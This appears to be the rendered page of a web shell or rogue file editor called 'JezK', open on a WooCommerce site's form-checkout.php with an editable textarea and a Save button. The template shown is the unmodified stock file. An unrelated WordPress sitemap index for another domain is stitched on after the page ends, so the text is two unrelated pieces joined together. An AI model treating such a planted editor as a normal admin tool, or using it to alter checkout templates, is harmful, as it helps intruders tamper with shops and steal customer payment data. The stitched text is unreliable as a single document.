
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: form-checkout.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Checkout Form
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/checkout/form-checkout.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see https://woo.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 3.5.0
 */

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit;
}

do_action( &#039;woocommerce_before_checkout_form&#039;, $checkout );

// If checkout registration is disabled and not logged in, the user cannot checkout.
if ( ! $checkout-&gt;is_registration_enabled() &amp;&amp; $checkout-&gt;is_registration_required() &amp;&amp; ! is_user_logged_in() ) {
	echo esc_html( apply_filters( &#039;woocommerce_checkout_must_be_logged_in_message&#039;, __( &#039;You must be logged in to checkout.&#039;, &#039;woocommerce&#039; ) ) );
	return;
}

?&gt;

&lt;form name=&quot;checkout&quot; method=&quot;post&quot; class=&quot;checkout woocommerce-checkout&quot; action=&quot;&lt;?php echo esc_url( wc_get_checkout_url() ); ?&gt;&quot; enctype=&quot;multipart/form-data&quot;&gt;

	&lt;?php if ( $checkout-&gt;get_checkout_fields() ) : ?&gt;

		&lt;?php do_action( &#039;woocommerce_checkout_before_customer_details&#039; ); ?&gt;

		&lt;div class=&quot;col2-set&quot; id=&quot;customer_details&quot;&gt;
			&lt;div class=&quot;col-1&quot;&gt;
				&lt;?php do_action( &#039;woocommerce_checkout_billing&#039; ); ?&gt;
			&lt;/div&gt;

			&lt;div class=&quot;col-2&quot;&gt;
				&lt;?php do_action( &#039;woocommerce_checkout_shipping&#039; ); ?&gt;
			&lt;/div&gt;
		&lt;/div&gt;

		&lt;?php do_action( &#039;woocommerce_checkout_after_customer_details&#039; ); ?&gt;

	&lt;?php endif; ?&gt;
	
	&lt;?php do_action( &#039;woocommerce_checkout_before_order_review_heading&#039; ); ?&gt;
	
	&lt;h3 id=&quot;order_review_heading&quot;&gt;&lt;?php esc_html_e( &#039;Your order&#039;, &#039;woocommerce&#039; ); ?&gt;&lt;/h3&gt;
	
	&lt;?php do_action( &#039;woocommerce_checkout_before_order_review&#039; ); ?&gt;

	&lt;div id=&quot;order_review&quot; class=&quot;woocommerce-checkout-review-order&quot;&gt;
		&lt;?php do_action( &#039;woocommerce_checkout_order_review&#039; ); ?&gt;
	&lt;/div&gt;

	&lt;?php do_action( &#039;woocommerce_checkout_after_order_review&#039; ); ?&gt;

&lt;/form&gt;

&lt;?php do_action( &#039;woocommerce_after_checkout_form&#039;, $checkout ); ?&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
